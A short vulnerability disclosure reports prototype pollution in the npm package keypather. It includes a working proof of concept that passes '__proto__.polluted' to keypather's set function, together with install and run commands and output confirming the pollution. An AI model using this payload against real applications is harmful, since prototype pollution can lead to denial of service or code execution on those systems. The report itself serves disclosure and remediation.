vulnerability prototype pollution
severity 7.3
language javascript
registry npm

✍️ Description

The npm package keypather is vulnerable to Prototype Pollution.

🕵️‍♂️ Proof of Concept

Create the following JavaScript file :

// PoC.js
const set = require('keypather/set')
console.log("Before : " + {}.polluted);
set({}, '__proto__.polluted', true)
console.log("After : " + {}.polluted);

Run the following commands in the terminal:

npm i keypather # to install the package
node PoC.js # to run the PoC

The output shows that Prototype pollution happens :

Before : undefined
After : true

💥 Impact

Prototype Pollution leads to Information Disclosure/DoS/RCE.